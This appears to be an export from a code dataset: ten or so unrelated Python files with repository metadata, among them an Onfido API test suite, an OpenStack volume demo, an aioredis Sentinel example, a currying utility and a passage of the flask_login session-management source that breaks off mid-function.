        download_url, text="FAKE IMAGE BINARY", headers={"Content-type": "image/png"})
    downloaded = api.live_photo.download(fake_uuid)
    assert download_endpoint.called is True
    assert downloaded.content_type == "image/png"
| 37.257143
| 170
| 0.751534
|
import onfido
from onfido.regions import Region
import io
api = onfido.Api("<AN_API_TOKEN>", region=Region.EU)
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
def test_upload_photo(requests_mock):
mock_upload = requests_mock.post("https://api.eu.onfido.com/v3.2/live_photos/", json=[])
sample_file = open("sample_photo.png", "rb")
request_body = {"advanced_validation": "true"}
api.live_photo.upload(sample_file, request_body)
assert mock_upload.called is True
def test_find_live_photo(requests_mock):
mock_find = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}", json=[])
api.live_photo.find(fake_uuid)
assert mock_find.called is True
def test_list_live_photos(requests_mock):
mock_list = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/?applicant_id={fake_uuid}", json=[])
api.live_photo.all(fake_uuid)
assert mock_list.called is True
def test_download_live_photo(requests_mock):
mock_download = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}/download", text="FAKE IMAGE BINARY", headers={"Content-type": "image/png"})
onfido_download = api.live_photo.download(fake_uuid)
assert mock_download.called is True
assert onfido_download.content_type == "image/png"
| true
| true
|
f705121c1bad013c291364ae04075091589dbba5
| 1,042
|
py
|
Python
|
_/chapter5-OpenStack/BlockStoreService/VolumeOperations.py
|
paullewallencom/hybrid-cloud-978-1-7888-3087-4
|
d101553fd342f420b581b87c58c7219f2b04a7c6
|
[
"Apache-2.0"
] | 3
|
2018-03-27T14:34:48.000Z
|
2021-10-04T16:28:19.000Z
|
_/chapter5-OpenStack/BlockStoreService/VolumeOperations.py
|
paullewallencom/hybrid-cloud-978-1-7888-3087-4
|
d101553fd342f420b581b87c58c7219f2b04a7c6
|
[
"Apache-2.0"
] | null | null | null |
_/chapter5-OpenStack/BlockStoreService/VolumeOperations.py
|
paullewallencom/hybrid-cloud-978-1-7888-3087-4
|
d101553fd342f420b581b87c58c7219f2b04a7c6
|
[
"Apache-2.0"
] | 1
|
2021-08-27T23:51:28.000Z
|
2021-08-27T23:51:28.000Z
|
#import OpenStack connection class from the SDK
from openstack import connection
# Create a connection object by calling the constructor and pass the security information
# NOTE(review): credentials are hard-coded for the book demo.  Do not
# commit real passwords — load them from environment variables or
# clouds.yaml in anything beyond an example.
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
                             project_name="demo",
                             username="admin",
                             password="manoj",
                             user_domain_id="default",
                             project_domain_id="default")
def create_volume(conn):
    """Create a 2 GB block-storage volume named 'packtpub-volume-2'."""
    props = {'size': '2', 'name': 'packtpub-volume-2'}
    conn.block_store.create_volume(**props)
def delete_volume(conn):
    """Delete the hard-coded demo volume by its id."""
    target = "3b064701-aaa7-418a-9df7-cad52bd549ee"
    conn.block_store.delete_volume(target)
def create_snapshot(conn):
    """Create a snapshot of the hard-coded demo volume."""
    props = {'volume_id': '3b064701-aaa7-418a-9df7-cad52bd549ee'}
    conn.block_store.create_snapshot(**props)
def delete_snapshot(conn):
    """Delete the hard-coded demo snapshot by its id."""
    target = "91ac5916-0baa-469e-ac4e-e37b2a3880dc"
    conn.block_store.delete_snapshot(target)
#create_snapshot(conn)
#delete_snapshot(conn)
#delete_volume(conn)
create_volume(conn)
| 29.771429
| 89
| 0.779271
|
from openstack import connection
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
project_name="demo",
username="admin",
password="manoj",
user_domain_id="default",
project_domain_id="default")
def create_volume(conn):
volume_properties = {'size':'2', 'name':'packtpub-volume-2'}
volume = conn.block_store.create_volume(**volume_properties)
def delete_volume(conn):
volume_id = "3b064701-aaa7-418a-9df7-cad52bd549ee"
conn.block_store.delete_volume(volume_id)
def create_snapshot(conn):
snapshot_properties = {'volume_id':'3b064701-aaa7-418a-9df7-cad52bd549ee'}
snapshot = conn.block_store.create_snapshot(**snapshot_properties)
def delete_snapshot(conn):
snapshot_id = "91ac5916-0baa-469e-ac4e-e37b2a3880dc"
conn.block_store.delete_snapshot(snapshot_id)
create_volume(conn)
| true
| true
|
f70513caa49442a4e72d71bac1f20f80278b0b7c
| 107
|
py
|
Python
|
{{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/__init__.py
|
JDongian/cookiecutter-pypackage
|
2e7c0d3a623755373560ee68fcb6a162085638c0
|
[
"Apache-2.0"
] | 2
|
2019-06-12T23:29:41.000Z
|
2019-06-25T20:35:47.000Z
|
{{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/__init__.py
|
JDongian/cookiecutter-pypackage
|
2e7c0d3a623755373560ee68fcb6a162085638c0
|
[
"Apache-2.0"
] | 4
|
2018-02-09T06:24:59.000Z
|
2019-01-23T06:46:11.000Z
|
{{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/__init__.py
|
JDongian/cookiecutter-pypackage
|
2e7c0d3a623755373560ee68fcb6a162085638c0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Top-level package for {{ cookiecutter.project_name }}"""
__version__ = '0.0.1'
| 21.4
| 59
| 0.616822
|
__version__ = '0.0.1'
| true
| true
|
f70513f071c9fec7e830d9232516ac75706443c6
| 10
|
py
|
Python
|
example_snippets/multimenus_snippets/Snippets/NumPy/Vectorized (universal) functions/Trigonometric and hyperbolic functions/tanh Compute hyperbolic tangent element-wise.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Vectorized (universal) functions/Trigonometric and hyperbolic functions/tanh Compute hyperbolic tangent element-wise.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Vectorized (universal) functions/Trigonometric and hyperbolic functions/tanh Compute hyperbolic tangent element-wise.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | 1
|
2021-02-04T04:51:48.000Z
|
2021-02-04T04:51:48.000Z
|
# Element-wise hyperbolic tangent; `np` (numpy) and `x` are expected to
# already exist in the snippet user's namespace.
np.tanh(x)
| 10
| 10
| 0.7
|
np.tanh(x)
| true
| true
|
f705141e5f48b22c12903c1fa1a907b58b1375d4
| 366
|
py
|
Python
|
examples/getting_started/06_sentinel.py
|
emorozov/aioredis
|
bad0bd2d1435e56688d189cf3209beec3d239557
|
[
"MIT"
] | null | null | null |
examples/getting_started/06_sentinel.py
|
emorozov/aioredis
|
bad0bd2d1435e56688d189cf3209beec3d239557
|
[
"MIT"
] | 75
|
2020-12-09T06:53:47.000Z
|
2022-03-25T01:05:24.000Z
|
examples/getting_started/06_sentinel.py
|
emorozov/aioredis
|
bad0bd2d1435e56688d189cf3209beec3d239557
|
[
"MIT"
] | null | null | null |
import asyncio
import aioredis
async def main():
    """Connect via Sentinel, then round-trip one key on the master."""
    # Two sentinel addresses are listed; aioredis tries them for discovery.
    sentinel = await aioredis.create_sentinel(
        ["redis://localhost:26379", "redis://sentinel2:26379"]
    )
    redis = sentinel.master_for("mymaster")
    ok = await redis.set("key", "value")
    assert ok
    val = await redis.get("key", encoding="utf-8")
    assert val == "value"
asyncio.run(main())
| 20.333333
| 62
| 0.639344
|
import asyncio
import aioredis
async def main():
sentinel = await aioredis.create_sentinel(
["redis://localhost:26379", "redis://sentinel2:26379"]
)
redis = sentinel.master_for("mymaster")
ok = await redis.set("key", "value")
assert ok
val = await redis.get("key", encoding="utf-8")
assert val == "value"
asyncio.run(main())
| true
| true
|
f705170d03d2dd066c58fc27f04b0e6e4b224eb2
| 1,573
|
py
|
Python
|
app/Resource/ImageResource.py
|
ansabkhaliq/backend
|
14bad9b44bfec6ea4ba27d1571ddcf614ff762c6
|
[
"MIT"
] | null | null | null |
app/Resource/ImageResource.py
|
ansabkhaliq/backend
|
14bad9b44bfec6ea4ba27d1571ddcf614ff762c6
|
[
"MIT"
] | 11
|
2020-09-22T11:15:09.000Z
|
2020-11-03T21:45:18.000Z
|
app/Resource/ImageResource.py
|
ansabkhaliq/backend
|
14bad9b44bfec6ea4ba27d1571ddcf614ff762c6
|
[
"MIT"
] | 2
|
2020-09-21T19:20:44.000Z
|
2021-03-21T04:46:19.000Z
|
import logging
from .DatabaseBase import DatabaseBase
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ImageResource(DatabaseBase):
    """Data-access helpers for product image / 3D-model rows in `images`."""

    def __init__(self):
        super().__init__()

    def get_product_images_by_id(self, id):
        """Return every image row for the given product id."""
        search_image_query = """Select * From images where productId = %s """
        values = [id]
        image_records = self.run_query(search_image_query, values, False)
        return image_records

    def get_threed_link_by_product_id(self, pid):
        """Return the first 3D-model row for the product, or None.

        Robustness fix: the original only checked ``records is None`` and
        raised IndexError when the query returned an empty list.
        """
        select_query = """ Select * from images where is3DModelType = 'Y' and productId = %s"""
        values = [str(pid)]
        records = self.run_query(select_query, values, True)
        if not records:
            return None
        return records[0]

    def update_threed_link(self, url, id_list):
        """Point each product in *id_list* at the new 3D-model location."""
        update_query = """UPDATE images SET threeDModelLocation = %s WHERE productId =%s and is3DModelType = 'Y' """
        for id in id_list:
            self.run_query(update_query, [url, id], False)

    def insert_threed_model(self, url, id_list):
        """Insert one 3D-model row per product id.

        Returns:
            int: 1 on success, 0 if the batch insert failed (rolled back).
        """
        insert_query = """INSERT INTO images(threeDModelLocation, is3DModelType, productId) VALUES (%s, %s, %s)"""
        values = [(url, 'Y', str(id)) for id in id_list]
        try:
            self.run_query_many(insert_query, values, True)
        except Exception:
            self.connection.rollback()
            # Fix: the original passed the exception as a bare positional
            # arg with no %s placeholder, which logging cannot format.
            # logger.exception records the message plus the traceback.
            logger.exception('Exception occurred when inserting order')
            return 0
        return 1
| 34.195652
| 117
| 0.633185
|
import logging
from .DatabaseBase import DatabaseBase
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ImageResource(DatabaseBase):
def __init__(self):
super().__init__()
def get_product_images_by_id(self, id):
search_image_query = """Select * From images where productId = %s """
values = [id]
image_records = self.run_query(search_image_query, values, False)
return image_records
def get_threed_link_by_product_id(self, pid):
select_query = """ Select * from images where is3DModelType = 'Y' and productId = %s"""
values = [str(pid)]
records = self.run_query(select_query, values, True)
if records is None:
return None
return records[0]
def update_threed_link(self, url, id_list):
update_query = """UPDATE images SET threeDModelLocation = %s WHERE productId =%s and is3DModelType = 'Y' """
for id in id_list:
self.run_query(update_query, [url, id], False)
def insert_threed_model(self, url, id_list):
insert_query = """INSERT INTO images(threeDModelLocation, is3DModelType, productId) VALUES (%s, %s, %s)"""
values = []
for id in id_list:
temp = (url, 'Y', str(id))
values.append(temp)
try:
self.run_query_many(insert_query, values, True)
except Exception as e:
self.connection.rollback()
logger.error('Exception occurred when inserting order', e)
return 0
return 1
| true
| true
|
f705181e0f045be38f7e9fa0b37412575523e61a
| 915
|
py
|
Python
|
weather_api/weather_api/urls.py
|
brian-duffy/yoyo-test
|
65700a0061022e326a0048695c122ea2cfb5d5fe
|
[
"OML"
] | null | null | null |
weather_api/weather_api/urls.py
|
brian-duffy/yoyo-test
|
65700a0061022e326a0048695c122ea2cfb5d5fe
|
[
"OML"
] | 12
|
2019-12-26T16:40:09.000Z
|
2022-03-11T23:17:44.000Z
|
weather_api/weather_api/urls.py
|
brian-duffy/yoyo-test
|
65700a0061022e326a0048695c122ea2cfb5d5fe
|
[
"OML"
] | null | null | null |
"""weather_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.views.generic import RedirectView
# Route the site root to the project's README; delegate every
# weather_app/ path to that app's own URLconf.
urlpatterns = [
    url(r'^$', RedirectView.as_view(url='https://github.com/brian-duffy/yoyo-test/blob/master/README.md')),
    url(r'weather_app/', include('weather_app.urls')),
]
| 38.125
| 107
| 0.711475
|
from django.conf.urls import url, include
from django.views.generic import RedirectView
urlpatterns = [
url(r'^$', RedirectView.as_view(url='https://github.com/brian-duffy/yoyo-test/blob/master/README.md')),
url(r'weather_app/', include('weather_app.urls')),
]
| true
| true
|
f705183f4fbd0db80b7cc60b42c57b39c75bdeac
| 2,196
|
py
|
Python
|
curry.py
|
christianscott/curry.py
|
2a8ef4b40853dff6b239f794fcc0e3f9a157d7ab
|
[
"MIT"
] | 2
|
2020-10-02T19:04:38.000Z
|
2021-10-01T10:51:14.000Z
|
curry.py
|
christianscott/curry.py
|
2a8ef4b40853dff6b239f794fcc0e3f9a157d7ab
|
[
"MIT"
] | 3
|
2019-09-09T09:41:10.000Z
|
2019-09-09T09:41:33.000Z
|
curry.py
|
christianscott/curry.py
|
2a8ef4b40853dff6b239f794fcc0e3f9a157d7ab
|
[
"MIT"
] | 1
|
2021-10-01T10:51:15.000Z
|
2021-10-01T10:51:15.000Z
|
"""Utility for currying functions."""
from functools import wraps
from inspect import signature, isbuiltin, isclass
def curry(func, args=None, kwargs=None, n=None, use_defaults=False):
    """Curry *func*; when use_defaults is True, parameters with default
    values also count toward the target arity."""
    wrapper_cls = CurriedDefault if use_defaults else Curried
    return wrapper_cls(func, args, kwargs, n)
class Curried:
    """Callable that accumulates arguments until the target arity is met,
    then invokes the wrapped function."""

    def __init__(self, func, args=None, kwargs=None, target_arg_count=None):
        # func: wrapped callable; args/kwargs: arguments collected so far;
        # target_arg_count: arity at which func fires (derived from func's
        # signature when not supplied).
        if not callable(func):
            raise TypeError('first argument must be callable')
        # Copy func's metadata (__name__, __doc__, ...) onto this instance.
        wraps(func)(self)
        self.func = func
        self.args = or_else(args, tuple())
        self.kwargs = or_else(kwargs, dict())
        self.target_arg_count = or_else(target_arg_count, get_target_arg_count(func))

    def __call__(self, *new_args, **new_kwargs):
        # Merge previously collected arguments with the new ones; invoke
        # once the expected arity is reached, otherwise return a fresh
        # curried callable carrying the merged arguments.
        args = self.args + new_args
        kwargs = self.kwargs.copy()
        kwargs.update(new_kwargs)
        if self._have_enough_args(args, kwargs):
            return self.func(*args, **kwargs)
        return self._clone(args, kwargs)

    def _clone(self, args, kwargs):
        # Subclass hook: build the next partial application of the same kind.
        return Curried(self.func, args, kwargs, self.target_arg_count)

    def _have_enough_args(self, args, kwargs):
        # Exact-arity check; subclasses may relax it (see CurriedDefault).
        return current_count(args, kwargs) == self.target_arg_count
class CurriedDefault(Curried):
    """Curried variant that also fires once only default-valued
    parameters remain unfilled."""

    def _clone(self, args, kwargs):
        return CurriedDefault(self.func, args, kwargs, self.target_arg_count)

    def _have_enough_args(self, args, kwargs):
        # Enough args when either the full arity is supplied, or all
        # parameters without defaults have been covered.
        count = current_count(args, kwargs)
        return count == self.target_arg_count or count == (self.target_arg_count - count_defaults(self.func))
def or_else(x, default):
    """Return *x* unless it is None, in which case return *default*."""
    if x is None:
        return default
    return x
def current_count(next_args, next_kwargs):
    """Total number of positional plus keyword arguments collected."""
    positional = len(next_args)
    keyword = len(next_kwargs)
    return positional + keyword
def count_defaults(func):
    """Number of positional and keyword-only defaults declared by *func*."""
    total = 0
    for defaults in (func.__defaults__, func.__kwdefaults__):
        if defaults is not None:
            total += len(defaults)
    return total
def get_target_arg_count(func):
if isclass(func) or isbuiltin(func):
# builtins, e.g. `map`, refer to class rather than fn
func = func.__call__
sig = signature(func)
return len(sig.parameters)
| 28.519481
| 109
| 0.676685
|
from functools import wraps
from inspect import signature, isbuiltin, isclass
def curry(func, args=None, kwargs=None, n=None, use_defaults=False):
if use_defaults:
return CurriedDefault(func, args, kwargs, n)
return Curried(func, args, kwargs, n)
class Curried:
def __init__(self, func, args=None, kwargs=None, target_arg_count=None):
if not callable(func):
raise TypeError('first argument must be callable')
wraps(func)(self)
self.func = func
self.args = or_else(args, tuple())
self.kwargs = or_else(kwargs, dict())
self.target_arg_count = or_else(target_arg_count, get_target_arg_count(func))
def __call__(self, *new_args, **new_kwargs):
args = self.args + new_args
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
if self._have_enough_args(args, kwargs):
return self.func(*args, **kwargs)
return self._clone(args, kwargs)
def _clone(self, args, kwargs):
return Curried(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
return current_count(args, kwargs) == self.target_arg_count
class CurriedDefault(Curried):
def _clone(self, args, kwargs):
return CurriedDefault(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
count = current_count(args, kwargs)
return count == self.target_arg_count or count == (self.target_arg_count - count_defaults(self.func))
def or_else(x, default):
return x if x is not None else default
def current_count(next_args, next_kwargs):
return len(next_args) + len(next_kwargs)
def count_defaults(func):
length = 0
if func.__defaults__ is not None:
length += len(func.__defaults__)
if func.__kwdefaults__ is not None:
length += len(func.__kwdefaults__)
return length
def get_target_arg_count(func):
if isclass(func) or isbuiltin(func):
func = func.__call__
sig = signature(func)
return len(sig.parameters)
| true
| true
|
f7051948f84339215d44128dbd1290fdb16a154f
| 786
|
py
|
Python
|
datalad/interface/download_url.py
|
AKSoo/datalad
|
dbc34478980c808a86b5531316c986abac953e37
|
[
"MIT"
] | null | null | null |
datalad/interface/download_url.py
|
AKSoo/datalad
|
dbc34478980c808a86b5531316c986abac953e37
|
[
"MIT"
] | 1
|
2020-12-01T20:13:51.000Z
|
2020-12-01T20:13:51.000Z
|
datalad/interface/download_url.py
|
jwodder/datalad
|
2b92a764fdc64b750dad68eb51c817218a1ec153
|
[
"MIT"
] | null | null | null |
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 et:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Obsolete module: moved to `local.download_url`
"""
import warnings
warnings.warn(
"DownloadURL has been moved to datalad.local.download_url. "
"This module was deprecated in 0.16.0, and will be removed in a future "
"release. Please adjust the import.",
DeprecationWarning)
# Import command class to ease 3rd-party transitions
from datalad.local.download_url import DownloadURL
| 37.428571
| 87
| 0.57888
| true
| true
|
|
f7051a146cd3b773029e9815898f0cb11b731acd
| 30,749
|
py
|
Python
|
venv/lib/python2.7/site-packages/flask_login.py
|
jessekl/twiliochallenge
|
2bba8bc2e0928880f1e2abe6b53b96dbc67ef34f
|
[
"MIT"
] | 2
|
2015-11-05T09:43:45.000Z
|
2017-05-31T14:22:02.000Z
|
flask/lib/site-packages/flask_login.py
|
CodingForChange/praquemdoar
|
575d67d211473f352adcd9d7c405c7a5cf18fc6e
|
[
"Apache-2.0"
] | null | null | null |
flask/lib/site-packages/flask_login.py
|
CodingForChange/praquemdoar
|
575d67d211473f352adcd9d7c405c7a5cf18fc6e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
flask.ext.login
---------------
This module provides user session management for Flask. It lets you log
your users in and out in a database-independent manner.
:copyright: (c) 2011 by Matthew Frazier.
:license: MIT/X11, see LICENSE for more details.
'''
__version_info__ = ('0', '2', '10')
__version__ = '.'.join(__version_info__)
__author__ = 'Matthew Frazier'
__license__ = 'MIT/X11'
__copyright__ = '(c) 2011 by Matthew Frazier'
__all__ = ['LoginManager']
from flask import (_request_ctx_stack, abort, current_app, flash, redirect,
request, session, url_for, has_request_context)
from flask.signals import Namespace
from werkzeug.local import LocalProxy
from werkzeug.security import safe_str_cmp
from werkzeug.urls import url_decode, url_encode
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1, md5
import hmac
import warnings
import sys
if sys.version < '3': # pragma: no cover
from urlparse import urlparse, urlunparse
else: # pragma: no cover
from urllib.parse import urlparse, urlunparse
unicode = str
_signals = Namespace()
#: A proxy for the current user. If no user is logged in, this will be an
#: anonymous user
current_user = LocalProxy(lambda: _get_user())
#: The default name of the "remember me" cookie (``remember_token``)
COOKIE_NAME = 'remember_token'
#: The default time before the "remember me" cookie expires (365 days).
COOKIE_DURATION = timedelta(days=365)
#: Whether the "remember me" cookie requires Secure; defaults to ``None``
COOKIE_SECURE = None
#: Whether the "remember me" cookie uses HttpOnly or not; defaults to ``False``
COOKIE_HTTPONLY = False
#: The default flash message to display when users need to log in.
LOGIN_MESSAGE = u'Please log in to access this page.'
#: The default flash message category to display when users need to log in.
LOGIN_MESSAGE_CATEGORY = 'message'
#: The default flash message to display when users need to reauthenticate.
REFRESH_MESSAGE = u'Please reauthenticate to access this page.'
#: The default flash message category to display when users need to
#: reauthenticate.
REFRESH_MESSAGE_CATEGORY = 'message'
#: The default attribute to retreive the unicode id of the user
ID_ATTRIBUTE = 'get_id'
#: Default name of the auth header (``Authorization``)
AUTH_HEADER_NAME = 'Authorization'
class LoginManager(object):
'''
This object is used to hold the settings used for logging in. Instances of
:class:`LoginManager` are *not* bound to specific apps, so you can create
one in the main body of your code and then bind it to your
app in a factory function.
'''
def __init__(self, app=None, add_context_processor=True):
#: A class or factory function that produces an anonymous user, which
#: is used when no one is logged in.
self.anonymous_user = AnonymousUserMixin
#: The name of the view to redirect to when the user needs to log in.
#: (This can be an absolute URL as well, if your authentication
#: machinery is external to your application.)
self.login_view = None
#: The message to flash when a user is redirected to the login page.
self.login_message = LOGIN_MESSAGE
#: The message category to flash when a user is redirected to the login
#: page.
self.login_message_category = LOGIN_MESSAGE_CATEGORY
#: The name of the view to redirect to when the user needs to
#: reauthenticate.
self.refresh_view = None
#: The message to flash when a user is redirected to the 'needs
#: refresh' page.
self.needs_refresh_message = REFRESH_MESSAGE
#: The message category to flash when a user is redirected to the
#: 'needs refresh' page.
self.needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY
#: The mode to use session protection in. This can be either
#: ``'basic'`` (the default) or ``'strong'``, or ``None`` to disable
#: it.
self.session_protection = 'basic'
#: If present, used to translate flash messages ``self.login_message``
#: and ``self.needs_refresh_message``
self.localize_callback = None
self.token_callback = None
self.user_callback = None
self.unauthorized_callback = None
self.needs_refresh_callback = None
self.id_attribute = ID_ATTRIBUTE
self.header_callback = None
self.request_callback = None
if app is not None:
self.init_app(app, add_context_processor)
def setup_app(self, app, add_context_processor=True): # pragma: no cover
'''
This method has been deprecated. Please use
:meth:`LoginManager.init_app` instead.
'''
warnings.warn('Warning setup_app is deprecated. Please use init_app.',
DeprecationWarning)
self.init_app(app, add_context_processor)
def init_app(self, app, add_context_processor=True):
'''
Configures an application. This registers an `after_request` call, and
attaches this `LoginManager` to it as `app.login_manager`.
:param app: The :class:`flask.Flask` object to configure.
:type app: :class:`flask.Flask`
:param add_context_processor: Whether to add a context processor to
the app that adds a `current_user` variable to the template.
Defaults to ``True``.
:type add_context_processor: bool
'''
app.login_manager = self
app.after_request(self._update_remember_cookie)
self._login_disabled = app.config.get('LOGIN_DISABLED',
app.config.get('TESTING', False))
if add_context_processor:
app.context_processor(_user_context_processor)
def unauthorized(self):
'''
This is called when the user is required to log in. If you register a
callback with :meth:`LoginManager.unauthorized_handler`, then it will
be called. Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.login_message` to the user.
- Redirect the user to `login_view`. (The page they were attempting
to access will be passed in the ``next`` query string variable,
so you can redirect there if present instead of the homepage.)
If :attr:`LoginManager.login_view` is not defined, then it will simply
raise a HTTP 401 (Unauthorized) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_unauthorized.send(current_app._get_current_object())
if self.unauthorized_callback:
return self.unauthorized_callback()
if not self.login_view:
abort(401)
if self.login_message:
if self.localize_callback is not None:
flash(self.localize_callback(self.login_message),
category=self.login_message_category)
else:
flash(self.login_message, category=self.login_message_category)
return redirect(login_url(self.login_view, request.url))
def user_loader(self, callback):
'''
This sets the callback for reloading a user from the session. The
function you set should take a user ID (a ``unicode``) and return a
user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.user_callback = callback
return callback
def header_loader(self, callback):
'''
This sets the callback for loading a user from a header value.
The function you set should take an authentication token and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.header_callback = callback
return callback
def request_loader(self, callback):
'''
This sets the callback for loading a user from a Flask request.
The function you set should take Flask request object and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.request_callback = callback
return callback
def token_loader(self, callback):
'''
This sets the callback for loading a user from an authentication
token. The function you set should take an authentication token
(a ``unicode``, as returned by a user's `get_auth_token` method) and
return a user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.token_callback = callback
return callback
def unauthorized_handler(self, callback):
'''
This will set the callback for the `unauthorized` method, which among
other things is used by `login_required`. It takes no arguments, and
should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.unauthorized_callback = callback
return callback
def needs_refresh_handler(self, callback):
'''
This will set the callback for the `needs_refresh` method, which among
other things is used by `fresh_login_required`. It takes no arguments,
and should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.needs_refresh_callback = callback
return callback
def needs_refresh(self):
'''
This is called when the user is logged in, but they need to be
reauthenticated because their session is stale. If you register a
callback with `needs_refresh_handler`, then it will be called.
Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.needs_refresh_message` to the user.
- Redirect the user to :attr:`LoginManager.refresh_view`. (The page
they were attempting to access will be passed in the ``next``
query string variable, so you can redirect there if present
instead of the homepage.)
If :attr:`LoginManager.refresh_view` is not defined, then it will
simply raise a HTTP 403 (Forbidden) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_needs_refresh.send(current_app._get_current_object())
if self.needs_refresh_callback:
return self.needs_refresh_callback()
if not self.refresh_view:
abort(403)
if self.localize_callback is not None:
flash(self.localize_callback(self.needs_refresh_message),
category=self.needs_refresh_message_category)
else:
flash(self.needs_refresh_message,
category=self.needs_refresh_message_category)
return redirect(login_url(self.refresh_view, request.url))
def reload_user(self, user=None):
ctx = _request_ctx_stack.top
if user is None:
user_id = session.get('user_id')
if user_id is None:
ctx.user = self.anonymous_user()
else:
user = self.user_callback(user_id)
if user is None:
logout_user()
else:
ctx.user = user
else:
ctx.user = user
def _load_user(self):
'''Loads user from session or remember_me cookie as applicable'''
user_accessed.send(current_app._get_current_object())
# first check SESSION_PROTECTION
config = current_app.config
if config.get('SESSION_PROTECTION', self.session_protection):
deleted = self._session_protection()
if deleted:
return self.reload_user()
# If a remember cookie is set, and the session is not, move the
# cookie user ID to the session.
#
# However, the session may have been set if the user has been
# logged out on this request, 'remember' would be set to clear,
# so we should check for that and not restore the session.
is_missing_user_id = 'user_id' not in session
if is_missing_user_id:
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
header_name = config.get('AUTH_HEADER_NAME', AUTH_HEADER_NAME)
has_cookie = (cookie_name in request.cookies and
session.get('remember') != 'clear')
if has_cookie:
return self._load_from_cookie(request.cookies[cookie_name])
elif header_name in request.headers:
return self._load_from_header(request.headers[header_name])
else:
return self._load_from_request(request)
return self.reload_user()
def _session_protection(self):
sess = session._get_current_object()
ident = _create_identifier()
app = current_app._get_current_object()
mode = app.config.get('SESSION_PROTECTION', self.session_protection)
# if there is no '_id', then take the current one for good
if '_id' not in sess:
sess['_id'] = ident
# if the sess is empty, it's an anonymous user, or just logged out
# so we can skip this, unless 'strong' protection is active,
# in which case we need to double check for the remember me token
check_protection = sess or mode == 'strong'
if check_protection and ident != sess.get('_id', None):
if mode == 'basic' or sess.permanent:
sess['_fresh'] = False
session_protected.send(app)
return False
elif mode == 'strong':
sess.clear()
sess['remember'] = 'clear'
session_protected.send(app)
return True
return False
def _load_from_cookie(self, cookie):
if self.token_callback:
user = self.token_callback(cookie)
if user is not None:
session['user_id'] = getattr(user, self.id_attribute)()
session['_fresh'] = False
_request_ctx_stack.top.user = user
else:
self.reload_user()
else:
user_id = decode_cookie(cookie)
if user_id is not None:
session['user_id'] = user_id
session['_fresh'] = False
self.reload_user()
if _request_ctx_stack.top.user is not None:
app = current_app._get_current_object()
user_loaded_from_cookie.send(app, user=_get_user())
def _load_from_header(self, header):
user = None
if self.header_callback:
user = self.header_callback(header)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_header.send(app, user=_get_user())
else:
self.reload_user()
def _load_from_request(self, request):
user = None
if self.request_callback:
user = self.request_callback(request)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_request.send(app, user=_get_user())
else:
self.reload_user()
def _update_remember_cookie(self, response):
# Don't modify the session unless there's something to do.
if 'remember' in session:
operation = session.pop('remember', None)
if operation == 'set' and 'user_id' in session:
self._set_cookie(response)
elif operation == 'clear':
self._clear_cookie(response)
return response
def _set_cookie(self, response):
# cookie settings
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
duration = config.get('REMEMBER_COOKIE_DURATION', COOKIE_DURATION)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
